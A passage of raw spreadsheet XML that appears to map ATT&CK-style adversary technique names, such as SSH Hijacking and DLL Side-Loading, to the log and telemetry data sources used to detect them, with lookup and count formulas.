        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E395" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G395" s="53" t="str">
        <f>VLOOKUP(A395,'REF-DataSources'!A:B,2)</f>
        <v>Disable Windows Event Logging</v>
      </c>
    </row>
    <row r="396" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A396" s="53" t="s">
        <v>2322</v>
      </c>
      <c r="B396" s="17" t="str">
        <f>LOOKUP(A396,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Process command-line parameters,Environment variable,File monitoring,Authentication logs,Process monitoring</v>
      </c>
      <c r="C396" s="53"/>
      <c r="D396" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E396" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G396" s="53" t="str">
        <f>VLOOKUP(A396,'REF-DataSources'!A:B,2)</f>
        <v>Impair Command History Logging</v>
      </c>
    </row>
    <row r="397" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A397" s="53" t="s">
        <v>2327</v>
      </c>
      <c r="B397" s="17" t="str">
        <f>LOOKUP(A397,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Windows Registry</v>
      </c>
      <c r="C397" s="53"/>
      <c r="D397" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E397" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G397" s="53" t="str">
        <f>VLOOKUP(A397,'REF-DataSources'!A:B,2)</f>
        <v>Disable or Modify System Firewall</v>
      </c>
    </row>
    <row r="398" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A398" s="53" t="s">
        <v>2332</v>
      </c>
      <c r="B398" s="17" t="str">
        <f>LOOKUP(A398,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Sensor health and status</v>
      </c>
      <c r="C398" s="53"/>
      <c r="D398" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E398" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G398" s="53" t="str">
        <f>VLOOKUP(A398,'REF-DataSources'!A:B,2)</f>
        <v>Indicator Blocking</v>
      </c>
    </row>
    <row r="399" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A399" s="53" t="s">
        <v>2338</v>
      </c>
      <c r="B399" s="17" t="str">
        <f>LOOKUP(A399,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C399" s="53"/>
      <c r="D399" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E399" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G399" s="53" t="str">
        <f>VLOOKUP(A399,'REF-DataSources'!A:B,2)</f>
        <v>Disable or Modify Cloud Firewall</v>
      </c>
    </row>
    <row r="400" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A400" s="55" t="s">
        <v>2343</v>
      </c>
      <c r="B400" s="17" t="str">
        <f>LOOKUP(A400,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Azure activity logs,GCP audit logs</v>
      </c>
      <c r="C400" s="53" t="s">
        <v>59</v>
      </c>
      <c r="D400" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E400" s="17">
        <f t="shared" si="14"/>
        <v>3</v>
      </c>
      <c r="G400" s="53" t="str">
        <f>VLOOKUP(A400,'REF-DataSources'!A:B,2)</f>
        <v>Disable Cloud Logs</v>
      </c>
    </row>
    <row r="401" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A401" s="53" t="s">
        <v>2348</v>
      </c>
      <c r="B401" s="17" t="str">
        <f>LOOKUP(A401,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs</v>
      </c>
      <c r="C401" s="53"/>
      <c r="D401" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E401" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G401" s="53" t="str">
        <f>VLOOKUP(A401,'REF-DataSources'!A:B,2)</f>
        <v>Remote Service Session Hijacking</v>
      </c>
    </row>
    <row r="402" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A402" s="55" t="s">
        <v>2353</v>
      </c>
      <c r="B402" s="17" t="str">
        <f>LOOKUP(A402,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C402" s="53">
        <v>100</v>
      </c>
      <c r="D402" s="17">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E402" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G402" s="53" t="str">
        <f>VLOOKUP(A402,'REF-DataSources'!A:B,2)</f>
        <v>SSH Hijacking</v>
      </c>
    </row>
    <row r="403" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A403" s="53" t="s">
        <v>2357</v>
      </c>
      <c r="B403" s="17" t="str">
        <f>LOOKUP(A403,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,Authentication logs</v>
      </c>
      <c r="C403" s="53"/>
      <c r="D403" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E403" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G403" s="53" t="str">
        <f>VLOOKUP(A403,'REF-DataSources'!A:B,2)</f>
        <v>RDP Hijacking</v>
      </c>
    </row>
    <row r="404" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A404" s="53" t="s">
        <v>2361</v>
      </c>
      <c r="B404" s="17" t="str">
        <f>LOOKUP(A404,'REF-DataSources'!A:C)</f>
        <v>API monitoring,PowerShell logs,Authentication logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C404" s="53"/>
      <c r="D404" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E404" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G404" s="53" t="str">
        <f>VLOOKUP(A404,'REF-DataSources'!A:B,2)</f>
        <v>Hide Artifacts</v>
      </c>
    </row>
    <row r="405" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A405" s="53" t="s">
        <v>2366</v>
      </c>
      <c r="B405" s="17" t="str">
        <f>LOOKUP(A405,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C405" s="53"/>
      <c r="D405" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E405" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G405" s="53" t="str">
        <f>VLOOKUP(A405,'REF-DataSources'!A:B,2)</f>
        <v>Hidden Files and Directories</v>
      </c>
    </row>
    <row r="406" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A406" s="55" t="s">
        <v>2370</v>
      </c>
      <c r="B406" s="17" t="str">
        <f>LOOKUP(A406,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Authentication logs</v>
      </c>
      <c r="C406" s="53" t="s">
        <v>111</v>
      </c>
      <c r="D406" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E406" s="17">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="G406" s="53" t="str">
        <f>VLOOKUP(A406,'REF-DataSources'!A:B,2)</f>
        <v>Hidden Users</v>
      </c>
    </row>
    <row r="407" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A407" s="53" t="s">
        <v>2375</v>
      </c>
      <c r="B407" s="17" t="str">
        <f>LOOKUP(A407,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,PowerShell logs</v>
      </c>
      <c r="C407" s="53"/>
      <c r="D407" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E407" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G407" s="53" t="str">
        <f>VLOOKUP(A407,'REF-DataSources'!A:B,2)</f>
        <v>Hidden Window</v>
      </c>
    </row>
    <row r="408" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A408" s="53" t="s">
        <v>2380</v>
      </c>
      <c r="B408" s="17" t="str">
        <f>LOOKUP(A408,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,API monitoring,File monitoring</v>
      </c>
      <c r="C408" s="53"/>
      <c r="D408" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E408" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G408" s="53" t="str">
        <f>VLOOKUP(A408,'REF-DataSources'!A:B,2)</f>
        <v>NTFS File Attributes</v>
      </c>
    </row>
    <row r="409" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A409" s="53" t="s">
        <v>2386</v>
      </c>
      <c r="B409" s="17" t="str">
        <f>LOOKUP(A409,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Windows Registry</v>
      </c>
      <c r="C409" s="53"/>
      <c r="D409" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E409" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G409" s="53" t="str">
        <f>VLOOKUP(A409,'REF-DataSources'!A:B,2)</f>
        <v>Hidden File System</v>
      </c>
    </row>
    <row r="410" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A410" s="53" t="s">
        <v>2391</v>
      </c>
      <c r="B410" s="17" t="str">
        <f>LOOKUP(A410,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Host network interface,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C410" s="53"/>
      <c r="D410" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E410" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G410" s="53" t="str">
        <f>VLOOKUP(A410,'REF-DataSources'!A:B,2)</f>
        <v>Run Virtual Instance</v>
      </c>
    </row>
    <row r="411" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A411" s="55" t="s">
        <v>2396</v>
      </c>
      <c r="B411" s="17" t="str">
        <f>LOOKUP(A411,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C411" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D411" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E411" s="17">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="G411" s="53" t="str">
        <f>VLOOKUP(A411,'REF-DataSources'!A:B,2)</f>
        <v>VBA Stomping</v>
      </c>
    </row>
    <row r="412" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A412" s="53" t="s">
        <v>2400</v>
      </c>
      <c r="B412" s="17" t="str">
        <f>LOOKUP(A412,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis,File monitoring,Application logs</v>
      </c>
      <c r="C412" s="53"/>
      <c r="D412" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E412" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G412" s="53" t="str">
        <f>VLOOKUP(A412,'REF-DataSources'!A:B,2)</f>
        <v>Data Manipulation</v>
      </c>
    </row>
    <row r="413" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A413" s="53" t="s">
        <v>2405</v>
      </c>
      <c r="B413" s="17" t="str">
        <f>LOOKUP(A413,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Application logs</v>
      </c>
      <c r="C413" s="53"/>
      <c r="D413" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E413" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G413" s="53" t="str">
        <f>VLOOKUP(A413,'REF-DataSources'!A:B,2)</f>
        <v>Stored Data Manipulation</v>
      </c>
    </row>
    <row r="414" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A414" s="53" t="s">
        <v>2410</v>
      </c>
      <c r="B414" s="17" t="str">
        <f>LOOKUP(A414,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis</v>
      </c>
      <c r="C414" s="53"/>
      <c r="D414" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E414" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G414" s="53" t="str">
        <f>VLOOKUP(A414,'REF-DataSources'!A:B,2)</f>
        <v>Transmitted Data Manipulation</v>
      </c>
    </row>
    <row r="415" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A415" s="55" t="s">
        <v>2415</v>
      </c>
      <c r="B415" s="17" t="str">
        <f>LOOKUP(A415,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C415" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D415" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E415" s="17">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="G415" s="53" t="str">
        <f>VLOOKUP(A415,'REF-DataSources'!A:B,2)</f>
        <v>Runtime Data Manipulation</v>
      </c>
    </row>
    <row r="416" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A416" s="53" t="s">
        <v>2419</v>
      </c>
      <c r="B416" s="17" t="str">
        <f>LOOKUP(A416,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Web proxy,Email gateway,Mail server,Network intrusion detection system,Detonation chamber,SSL/TLS inspection,Anti-virus</v>
      </c>
      <c r="C416" s="53"/>
      <c r="D416" s="17">
        <f t="shared" si="13"/>
        <v>9</v>
      </c>
      <c r="E416" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G416" s="53" t="str">
        <f>VLOOKUP(A416,'REF-DataSources'!A:B,2)</f>
        <v>Phishing</v>
      </c>
    </row>
    <row r="417" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A417" s="53" t="s">
        <v>2425</v>
      </c>
      <c r="B417" s="17" t="str">
        <f>LOOKUP(A417,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</v>
      </c>
      <c r="C417" s="53"/>
      <c r="D417" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E417" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G417" s="53" t="str">
        <f>VLOOKUP(A417,'REF-DataSources'!A:B,2)</f>
        <v>Spearphishing Attachment</v>
      </c>
    </row>
    <row r="418" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A418" s="53" t="s">
        <v>2430</v>
      </c>
      <c r="B418" s="17" t="str">
        <f>LOOKUP(A418,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</v>
      </c>
      <c r="C418" s="53"/>
      <c r="D418" s="17">
        <f t="shared" si="13"/>
        <v>7</v>
      </c>
      <c r="E418" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G418" s="53" t="str">
        <f>VLOOKUP(A418,'REF-DataSources'!A:B,2)</f>
        <v>Spearphishing Link</v>
      </c>
    </row>
    <row r="419" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A419" s="53" t="s">
        <v>2435</v>
      </c>
      <c r="B419" s="17" t="str">
        <f>LOOKUP(A419,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Anti-virus,Web proxy</v>
      </c>
      <c r="C419" s="53"/>
      <c r="D419" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E419" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G419" s="53" t="str">
        <f>VLOOKUP(A419,'REF-DataSources'!A:B,2)</f>
        <v>Spearphishing via Service</v>
      </c>
    </row>
    <row r="420" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A420" s="53" t="s">
        <v>2440</v>
      </c>
      <c r="B420" s="17" t="str">
        <f>LOOKUP(A420,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="C420" s="53"/>
      <c r="D420" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E420" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G420" s="53" t="str">
        <f>VLOOKUP(A420,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration Over Web Service</v>
      </c>
    </row>
    <row r="421" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A421" s="53" t="s">
        <v>2445</v>
      </c>
      <c r="B421" s="17" t="str">
        <f>LOOKUP(A421,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="C421" s="53"/>
      <c r="D421" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E421" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G421" s="53" t="str">
        <f>VLOOKUP(A421,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration to Code Repository</v>
      </c>
    </row>
    <row r="422" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A422" s="53" t="s">
        <v>2449</v>
      </c>
      <c r="B422" s="17" t="str">
        <f>LOOKUP(A422,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="C422" s="53"/>
      <c r="D422" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E422" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G422" s="53" t="str">
        <f>VLOOKUP(A422,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration to Cloud Storage</v>
      </c>
    </row>
    <row r="423" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A423" s="53" t="s">
        <v>2453</v>
      </c>
      <c r="B423" s="17" t="str">
        <f>LOOKUP(A423,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,DNS records</v>
      </c>
      <c r="C423" s="53"/>
      <c r="D423" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E423" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G423" s="53" t="str">
        <f>VLOOKUP(A423,'REF-DataSources'!A:B,2)</f>
        <v>Dynamic Resolution</v>
      </c>
    </row>
    <row r="424" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A424" s="55" t="s">
        <v>2458</v>
      </c>
      <c r="B424" s="17" t="str">
        <f>LOOKUP(A424,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C424" s="53">
        <v>100</v>
      </c>
      <c r="D424" s="17">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E424" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G424" s="53" t="str">
        <f>VLOOKUP(A424,'REF-DataSources'!A:B,2)</f>
        <v>Fast Flux DNS</v>
      </c>
    </row>
    <row r="425" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A425" s="53" t="s">
        <v>2463</v>
      </c>
      <c r="B425" s="17" t="str">
        <f>LOOKUP(A425,'REF-DataSources'!A:C)</f>
        <v>DNS records,Netflow/Enclave netflow,Network device logs,Packet capture,Process use of network</v>
      </c>
      <c r="C425" s="53"/>
      <c r="D425" s="17">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="E425" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G425" s="53" t="str">
        <f>VLOOKUP(A425,'REF-DataSources'!A:B,2)</f>
        <v>Domain Generation Algorithms</v>
      </c>
    </row>
    <row r="426" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A426" s="55" t="s">
        <v>2468</v>
      </c>
      <c r="B426" s="17" t="str">
        <f>LOOKUP(A426,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C426" s="53">
        <v>100</v>
      </c>
      <c r="D426" s="17">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E426" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G426" s="53" t="str">
        <f>VLOOKUP(A426,'REF-DataSources'!A:B,2)</f>
        <v>DNS Calculation</v>
      </c>
    </row>
    <row r="427" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A427" s="53" t="s">
        <v>2472</v>
      </c>
      <c r="B427" s="17" t="str">
        <f>LOOKUP(A427,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C427" s="53"/>
      <c r="D427" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E427" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G427" s="53" t="str">
        <f>VLOOKUP(A427,'REF-DataSources'!A:B,2)</f>
        <v>System Services</v>
      </c>
    </row>
    <row r="428" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A428" s="53" t="s">
        <v>2477</v>
      </c>
      <c r="B428" s="17" t="str">
        <f>LOOKUP(A428,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C428" s="53"/>
      <c r="D428" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E428" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G428" s="53" t="str">
        <f>VLOOKUP(A428,'REF-DataSources'!A:B,2)</f>
        <v>Launchctl</v>
      </c>
    </row>
    <row r="429" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A429" s="53" t="s">
        <v>2481</v>
      </c>
      <c r="B429" s="17" t="str">
        <f>LOOKUP(A429,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C429" s="53"/>
      <c r="D429" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E429" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G429" s="53" t="str">
        <f>VLOOKUP(A429,'REF-DataSources'!A:B,2)</f>
        <v>Service Execution</v>
      </c>
    </row>
    <row r="430" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A430" s="53" t="s">
        <v>2485</v>
      </c>
      <c r="B430" s="17" t="str">
        <f>LOOKUP(A430,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C430" s="53"/>
      <c r="D430" s="17">
        <f t="shared" si="13"/>
        <v>7</v>
      </c>
      <c r="E430" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G430" s="53" t="str">
        <f>VLOOKUP(A430,'REF-DataSources'!A:B,2)</f>
        <v>Lateral Tool Transfer</v>
      </c>
    </row>
    <row r="431" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A431" s="53" t="s">
        <v>2489</v>
      </c>
      <c r="B431" s="17" t="str">
        <f>LOOKUP(A431,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C431" s="53"/>
      <c r="D431" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E431" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G431" s="53" t="str">
        <f>VLOOKUP(A431,'REF-DataSources'!A:B,2)</f>
        <v>Non-Standard Port</v>
      </c>
    </row>
    <row r="432" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A432" s="53" t="s">
        <v>2494</v>
      </c>
      <c r="B432" s="17" t="str">
        <f>LOOKUP(A432,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C432" s="53"/>
      <c r="D432" s="17">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="E432" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G432" s="53" t="str">
        <f>VLOOKUP(A432,'REF-DataSources'!A:B,2)</f>
        <v>Protocol Tunneling</v>
      </c>
    </row>
    <row r="433" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A433" s="53" t="s">
        <v>2498</v>
      </c>
      <c r="B433" s="17" t="str">
        <f>LOOKUP(A433,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C433" s="53"/>
      <c r="D433" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E433" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G433" s="53" t="str">
        <f>VLOOKUP(A433,'REF-DataSources'!A:B,2)</f>
        <v>Encrypted Channel</v>
      </c>
    </row>
    <row r="434" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A434" s="53" t="s">
        <v>2503</v>
      </c>
      <c r="B434" s="17" t="str">
        <f>LOOKUP(A434,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C434" s="53"/>
      <c r="D434" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E434" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G434" s="53" t="str">
        <f>VLOOKUP(A434,'REF-DataSources'!A:B,2)</f>
        <v>Symmetric Cryptography</v>
      </c>
    </row>
    <row r="435" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A435" s="53" t="s">
        <v>2507</v>
      </c>
      <c r="B435" s="17" t="str">
        <f>LOOKUP(A435,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C435" s="53"/>
      <c r="D435" s="17">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="E435" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G435" s="53" t="str">
        <f>VLOOKUP(A435,'REF-DataSources'!A:B,2)</f>
        <v>Asymmetric Cryptography</v>
      </c>
    </row>
    <row r="436" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A436" s="53" t="s">
        <v>2511</v>
      </c>
      <c r="B436" s="17" t="str">
        <f>LOOKUP(A436,'REF-DataSources'!A:C)</f>
        <v>Environment variable,Loaded DLLs,Process command-line parameters,Process monitoring,File monitoring,DLL monitoring</v>
      </c>
      <c r="C436" s="53"/>
      <c r="D436" s="17">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E436" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G436" s="53" t="str">
        <f>VLOOKUP(A436,'REF-DataSources'!A:B,2)</f>
        <v>Hijack Execution Flow</v>
      </c>
    </row>
    <row r="437" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A437" s="53" t="s">
        <v>2517</v>
      </c>
      <c r="B437" s="17" t="str">
        <f>LOOKUP(A437,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="C437" s="53"/>
      <c r="D437" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E437" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G437" s="53" t="str">
        <f>VLOOKUP(A437,'REF-DataSources'!A:B,2)</f>
        <v>DLL Search Order Hijacking</v>
      </c>
    </row>
    <row r="438" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A438" s="53" t="s">
        <v>2522</v>
      </c>
      <c r="B438" s="17" t="str">
        <f>LOOKUP(A438,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Process use of network</v>
      </c>
      <c r="C438" s="53"/>
      <c r="D438" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E438" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G438" s="53" t="str">
        <f>VLOOKUP(A438,'REF-DataSources'!A:B,2)</f>
        <v>DLL Side-Loading</v>
      </c>
    </row>
    <row r="439" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A439" s="55" t="s">
        <v>2527</v>
      </c>
      <c r="B439" s="17" t="str">
        <f>LOOKUP(A439,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C439" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D439" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E439" s="17">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="G439" s="53" t="str">
        <f>VLOOKUP(A439,'REF-DataSources'!A:B,2)</f>
        <v>Dylib Hijacking</v>
      </c>
    </row>
    <row r="440" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A440" s="53" t="s">
        <v>2531</v>
      </c>
      <c r="B440" s="17" t="str">
